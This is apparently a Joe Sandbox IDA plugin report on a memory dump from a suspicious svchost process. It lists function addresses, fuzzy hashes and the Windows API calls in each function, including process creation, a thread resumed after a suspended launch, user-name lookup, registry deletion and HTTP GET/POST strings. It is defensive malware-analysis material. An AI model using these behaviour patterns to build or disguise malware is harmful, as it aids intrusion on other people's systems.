Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: c44a5255294b84accf69ba130f87955e3164fd0b8c0fa9b6ffc4e32fbf058d2d
Instruction ID: 0eaf6cf1437bbc621135f277ce5eb2f9b83835a3da10d7ab309147dd8534c624
Opcode Fuzzy Hash: c44a5255294b84accf69ba130f87955e3164fd0b8c0fa9b6ffc4e32fbf058d2d
Instruction Fuzzy Hash: 83213B72E443155BC3315FB59C98B27BBACDF89A10F60451DF681AB241EFB0F8058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02AC24B4
lstrlen.KERNEL32(00000000), ref: 02AC24D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC2524
HeapFree.KERNEL32(00000000), ref: 02AC252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC254C
HeapFree.KERNEL32(00000000), ref: 02AC2553

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 89de725abd7389d2e27e760d1f2a580803bde0d8089e0bc0f83b7e44f6bf9c21
Instruction ID: 8319ead599105adc555bfa767db94bc49f44f20d07a4efdf7ee958ec8dfa902f
Opcode Fuzzy Hash: 89de725abd7389d2e27e760d1f2a580803bde0d8089e0bc0f83b7e44f6bf9c21
Instruction Fuzzy Hash: 75211D71C41209EBEF11DFA5DA487AEBAB9EF44326F304459D900B1190DF748A59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02AC38A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 02AC38B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 02AC38D6
RtlAllocateHeap.NTDLL(00000000), ref: 02AC38DD
_vsnprintf.MSVCRT ref: 02AC38F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC390C
HeapFree.KERNEL32(00000000), ref: 02AC3913

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: c67379e0e267509f4b134458ac8b2c67d67e11b9c339df305ffc7781d800c0ad
Instruction ID: 394956a64f5c752010552d3bcfd6ac110b834799cb77bbe21868b7c11c896594
Opcode Fuzzy Hash: c67379e0e267509f4b134458ac8b2c67d67e11b9c339df305ffc7781d800c0ad
Instruction Fuzzy Hash: BD01DF729802097BDB005AB4CC04FBB776CEB44760F208869FF06D6200EE30E9128B70

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02AC30CE,00000000,?,02AC30CE,?), ref: 02AC4433
GetProcessHeap.KERNEL32(00000008), ref: 02AC4447
RtlAllocateHeap.NTDLL(00000000), ref: 02AC444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02AC4465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC4471
HeapFree.KERNEL32(00000000), ref: 02AC4478

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: 86d465510c4ab5276748e37b2954c679a4ba2b9c532124125b7ee5526ce4eac1
Instruction ID: c94a27a21429f737cb10d92470078dcf14a24f4960d0888cc82e3015d625c584
Opcode Fuzzy Hash: 86d465510c4ab5276748e37b2954c679a4ba2b9c532124125b7ee5526ce4eac1
Instruction Fuzzy Hash: F4F04F71945112ABD7214B26AC5CE6BBFACEFC9B26B21891CF455D2114DF30C816CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC16FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02AC17FB,00000001), ref: 02AC1708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02AC1722
RtlAllocateHeap.NTDLL(00000000), ref: 02AC1729
ExpandEnvironmentStringsA.KERNEL32(02AC138F,00000000,-00000040), ref: 02AC173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC1747
HeapFree.KERNEL32(00000000), ref: 02AC174E

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: b5206fdc4c1fd09ebe3dcae7ad04bf091c2690d2d4ba8ee512220f33767e5316
Instruction ID: da632b8dd4ff37af91e97dc6845d53ac893ff83311a288ce0e7dde7f9f919008
Opcode Fuzzy Hash: b5206fdc4c1fd09ebe3dcae7ad04bf091c2690d2d4ba8ee512220f33767e5316
Instruction Fuzzy Hash: B4F0B471B40211A7DB215B75AC4CF4B7AADABC9755F310828F949D6254EF30CC1A8F60

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,02AC60A0), ref: 02AC333C
QueryPerformanceCounter.KERNEL32(?), ref: 02AC334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02AC3372
GetTickCount.KERNEL32 ref: 02AC337A

Strings

&%c=%u, xrefs: 02AC3332

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: e655861cc7496737c67d25abdce224931ad02b8eaf955c1eee9cf81677265954
Instruction ID: 4d1e0148edc134d43608a74577d2eb6f93a4f5da397608c24f31edead154cbb2
Opcode Fuzzy Hash: e655861cc7496737c67d25abdce224931ad02b8eaf955c1eee9cf81677265954
Instruction Fuzzy Hash: B8F0F431E10108EBDF10DBE4DD89AADBBB9FB45301F2488D8E515E2250DF31EA218B10

Uniqueness

Uniqueness Score: -1.00%

Function 02AC175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02AC1784

Part of subcall function 02AC16FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02AC17FB,00000001), ref: 02AC1708

GetProcessHeap.KERNEL32(00000000,?), ref: 02AC180F
HeapFree.KERNEL32(00000000), ref: 02AC1816

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: 4fb13222b30e3258be7f1ad28306cf58717edd54c193ab93b28ea9a6d6512560
Instruction ID: d199381196c140afe4a1b641a5c3ca0c1b8526638597a12b0484a09ab5195513
Opcode Fuzzy Hash: 4fb13222b30e3258be7f1ad28306cf58717edd54c193ab93b28ea9a6d6512560
Instruction Fuzzy Hash: ED31BE76608302EFEB16AF649C84B6AB7ECAF49751F30083DE585D6146EF30D8058F91

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02AC5367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02AC50BA,00000000), ref: 02AC537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,02AC50BA,00000000), ref: 02AC538C
RtlAllocateHeap.NTDLL(00000000), ref: 02AC5393
lstrcpy.KERNEL32(00000000,?), ref: 02AC53A3

Part of subcall function 02AC4543: StrStrIA.SHLWAPI(?,?,?,?,02AC712C,02AC62E4,02AC7224,?), ref: 02AC4563

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: f5a914fffc4e6bc14674358e6e3a5b83e7a1bc04eba1877601aed8293348e6e1
Instruction ID: 82d6b99ddc4930da750303f0b4ccd88f67e615dd77de0c420cff177b1f695732
Opcode Fuzzy Hash: f5a914fffc4e6bc14674358e6e3a5b83e7a1bc04eba1877601aed8293348e6e1
Instruction Fuzzy Hash: 7D115E72D8411D7AEB01EBD5CD05CFEB7BDFB04700B24041AF911E6114DE709A098F65

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,02AC36F0,02AC1134,?), ref: 02AC378E
RtlAllocateHeap.NTDLL(00000000,?,02AC36F0), ref: 02AC3795
_vsnprintf.MSVCRT ref: 02AC37AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,02AC36F0,02AC1134,?), ref: 02AC37EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,02AC36F0,02AC1134,?), ref: 02AC37F3

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: f1323cee5d8561cb9c965cb43c91c99446cd1e91262e3140161e8c824c5c9584
Instruction ID: 435cf415fe5dd1f11c04b0f684d902b704b0aa4dcb6e366e805c9e900f0b8bb8
Opcode Fuzzy Hash: f1323cee5d8561cb9c965cb43c91c99446cd1e91262e3140161e8c824c5c9584
Instruction Fuzzy Hash: 0501CC76584101BFDB415774ED45F677A6DEF84760F308868FA1495114EE31CC168BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02AC4F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02AC4F84
CloseHandle.KERNEL32(00000000), ref: 02AC4F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC4FB5
HeapFree.KERNEL32(00000000), ref: 02AC4FBC

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 3deee77b98706111463f6864e647fc29adbff7ff4caf4941c4bc0e93564264b6
Instruction ID: 7d9f007fec5c129f1064b915e96b5bb008e001cb4a8dbb06d1bdf2e7615f87c4
Opcode Fuzzy Hash: 3deee77b98706111463f6864e647fc29adbff7ff4caf4941c4bc0e93564264b6
Instruction Fuzzy Hash: 26F0B432C45129FFDB219FA0DC18A9EBA6CEF09B25F314619FD0595154CF308A128FD5

Uniqueness

Uniqueness Score: -1.00%

Function 02AC21C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02AC2225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 02AC225A
RtlAllocateHeap.NTDLL(00000000), ref: 02AC2261

Strings

f<v, xrefs: 02AC23B0

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: ba6b70147cda3e220ae5c02954cea26d84692b92edf1af82049e5be4ff9af63f
Instruction ID: 0b9d2fd0738fa8f1b1ed046503de4808b3ce68fadaa9630164cb30b0a6c465da
Opcode Fuzzy Hash: ba6b70147cda3e220ae5c02954cea26d84692b92edf1af82049e5be4ff9af63f
Instruction Fuzzy Hash: 4B819E72948351ABE321DF649D80B67BBECAF85340F25486EFC8597250EF34D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02AC315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 02AC32A2
RtlAllocateHeap.NTDLL(00000000), ref: 02AC32AF

Strings

GET, xrefs: 02AC31D0, 02AC31DC
POST, xrefs: 02AC31B9

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 7f2f58cd1aee924f497b9f361d9a1008ce3b3328d7df07484d2ab09b28242db3
Instruction ID: 4a59d065ab3a73443ffb22b1baddb7d9900cecbefa5acd6a00e7f43b1fac1d1b
Opcode Fuzzy Hash: 7f2f58cd1aee924f497b9f361d9a1008ce3b3328d7df07484d2ab09b28242db3
Instruction Fuzzy Hash: F2514AB1644346AFDB208F25CC84B2BBBECFB88704F24895DB996D2254DB34D8098F61

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 02AC392F
memset.MSVCRT ref: 02AC3983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 02AC39B3

Strings

D, xrefs: 02AC398B

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: 843b7955f30feab62b091ff2fe2c494cd827fe0d3e200a14dca4e36a00039760
Instruction ID: 9acc91bca2104915056c7b78b0d4035ae3563c0b1b886238aefae491f34f7ea0
Opcode Fuzzy Hash: 843b7955f30feab62b091ff2fe2c494cd827fe0d3e200a14dca4e36a00039760
Instruction Fuzzy Hash: 0511A272808219ABC710AF21DC04D5BBFACEF857A4F124A19FD55A2150DB32D9198FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02AC4EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02AC4F35

Part of subcall function 02AC49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000), ref: 02AC4A7A
Part of subcall function 02AC49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000,?,?,?), ref: 02AC4A81
Part of subcall function 02AC49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000), ref: 02AC4A92
Part of subcall function 02AC49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000,?,?,?), ref: 02AC4A99

ResumeThread.KERNEL32(02AC49A2,?,?,?), ref: 02AC4F51
CloseHandle.KERNEL32(02AC49A2,?,?,?), ref: 02AC4F5A

Strings

D, xrefs: 02AC4F02

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 8c05968fc2c1b43441b77f2809d688f8290512a5fac3eca81d0ef14112deb8b0
Instruction ID: dce61b2066d8fb4d130e71fc7719255e888f092df154050827f015e947bfef24
Opcode Fuzzy Hash: 8c05968fc2c1b43441b77f2809d688f8290512a5fac3eca81d0ef14112deb8b0
Instruction Fuzzy Hash: AE0140B694020CBFEB419AE8DC85DEFB7BDFB08314F200429F605E6050EA309D188A65

Uniqueness

Uniqueness Score: -1.00%

Function 02AC27E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02AC27F9
CreateProcessW.KERNEL32(00000000,02AC62F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02AC2825
ExitProcess.KERNEL32 ref: 02AC282C

Strings

D, xrefs: 02AC2800

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: c249fdff69d810f385df3e6f69f1a9334606c570f8e77729ee7592a426791857
Instruction ID: 7bb2790b830e70f786fc6f584fa509b02e20712deaf112b04414b93f7fc26f35
Opcode Fuzzy Hash: c249fdff69d810f385df3e6f69f1a9334606c570f8e77729ee7592a426791857
Instruction Fuzzy Hash: ECE0EDB184064C7EE740DBF9CD85EAFF7BCAB48704F100825B716E6054DA78AE1C8B66

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC525E
Sleep.KERNEL32(00001388), ref: 02AC5271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC5327
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC5333

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: d46d2908beb626ee671f4364105f47290c3d4c89d9ec4f9b79ddc6355af26fd2
Instruction ID: 39c71e946da9b17859cdec4d3e6a58bb992e763115bf1f61486b0bc27ba15a8a
Opcode Fuzzy Hash: d46d2908beb626ee671f4364105f47290c3d4c89d9ec4f9b79ddc6355af26fd2
Instruction Fuzzy Hash: F341DF729043009BD720DFA4CC88B6BB7E8EF84319F640E1DF596A2290DF34E519CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02AC5B64

Part of subcall function 02AC2F1A: CryptAcquireContextW.ADVAPI32(02AC7658,00000000,00000000,00000001,F0000000,02AC62B0,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F35
Part of subcall function 02AC2F1A: CryptCreateHash.ADVAPI32(02AC7658,00008003,00000000,00000000,?,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F52
Part of subcall function 02AC2F1A: CryptHashData.ADVAPI32(?,02AC7658,?,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F68
Part of subcall function 02AC2F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F83
Part of subcall function 02AC2F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02AC5B88,?,00000000,?), ref: 02AC2FA3
Part of subcall function 02AC2F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2FB3
Part of subcall function 02AC2F1A: CryptReleaseContext.ADVAPI32(02AC7658,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2FC2

Part of subcall function 02AC44D2: wsprintfA.USER32 ref: 02AC4509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02AC5BF4

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 6f2132c7642c314dcddf6a5868259cb4c56d5f32381693b84d074b93404bab23
Instruction ID: 1d8cbd074a2301a35a6a61d76526907da59d5d7935ec19024d6c6e4d84f11dd4
Opcode Fuzzy Hash: 6f2132c7642c314dcddf6a5868259cb4c56d5f32381693b84d074b93404bab23
Instruction Fuzzy Hash: A321A2728442489FDB119FA4CC94AEEBFBCEB05310F740559F916E6101DB21E555CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02AC3904,?,00000000,00000000,00000000,00000007,?,?), ref: 02AC3855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02AC3904), ref: 02AC385C

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 83c969b5e019f90bc32b30e93dced7a0966c7f989b240e00860900a128cb8470
Instruction ID: 9231edf0036a64ecd37d4fc649a9e8d2d8e9e49b67b48fbe715a4b58a30407c9
Opcode Fuzzy Hash: 83c969b5e019f90bc32b30e93dced7a0966c7f989b240e00860900a128cb8470
Instruction Fuzzy Hash: 04119A72A083018BCB308F69D884B66B7E9AF85705F2888ADE5D2C7344DB70E846CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02AC540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02AC542D
RtlAllocateHeap.NTDLL(00000000), ref: 02AC5434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC5496
HeapFree.KERNEL32(00000000), ref: 02AC549D

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 1f6e686867085d53b049b5c492836374e696b791524bb5c75122603f6a070bca
Instruction ID: 110d843cea959aa47270e74f03c1e4c4459c1716b031acb21facdd7f01113aa4
Opcode Fuzzy Hash: 1f6e686867085d53b049b5c492836374e696b791524bb5c75122603f6a070bca
Instruction Fuzzy Hash: 3C110A76D402046BCF119EA89D88EA7B76EAB88611F644569FE49F7204DF30E8058BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000), ref: 02AC4AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02AC4ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02AC4B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02AC4B11

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: ebef4a6249f518d29ceb8e3fad4121a88be8671980eefdf67ae95ceb195031cf
Instruction ID: f8c8e1f59e95a1c323261b2a093c482630c76a53bda7d775bc59f808265e67a9
Opcode Fuzzy Hash: ebef4a6249f518d29ceb8e3fad4121a88be8671980eefdf67ae95ceb195031cf
Instruction Fuzzy Hash: BA117375A40701AFEB619F74DC55B12B7E8AF08314F28892DF686C61A4EF31D414DF18

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC14DF
HeapFree.KERNEL32(00000000), ref: 02AC14E6

Strings

!, xrefs: 02AC14A3
!, xrefs: 02AC14C6

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: 12d7b3b7b1db3dc21224ccf27545c619961feb62a820f40a24d21a766866f94e
Instruction ID: c8833fd4dfb6e3206b234b8060a7c658316f896f53b431201d660d6327c8f0fc
Opcode Fuzzy Hash: 12d7b3b7b1db3dc21224ccf27545c619961feb62a820f40a24d21a766866f94e
Instruction Fuzzy Hash: AFF090B2784214AEFB105A74DD49BF67B9DEB05760F688429FD08C5282EE70D9908AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC25E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02AC7328), ref: 02AC25F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02AC2612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02AC2623
GetLastError.KERNEL32 ref: 02AC262D

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: a9e007568c804c5d975503826d7dc6d4f14d6bdb5d696a682ec2a6b74a01b881
Instruction ID: b1d56c2b90667fc0427bb73f545b452950d78324eb3c164721b91cbf095841c6
Opcode Fuzzy Hash: a9e007568c804c5d975503826d7dc6d4f14d6bdb5d696a682ec2a6b74a01b881
Instruction Fuzzy Hash: D9F03031A44249ABE720A6B6AC8DEAFBBBCEBC5B15F60402EF815C1140EE15D8158F31

Uniqueness

Uniqueness Score: -1.00%

Function 02AC49EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000), ref: 02AC4A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000,?,?,?), ref: 02AC4A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02AC4F4C,?,00000000), ref: 02AC4A92
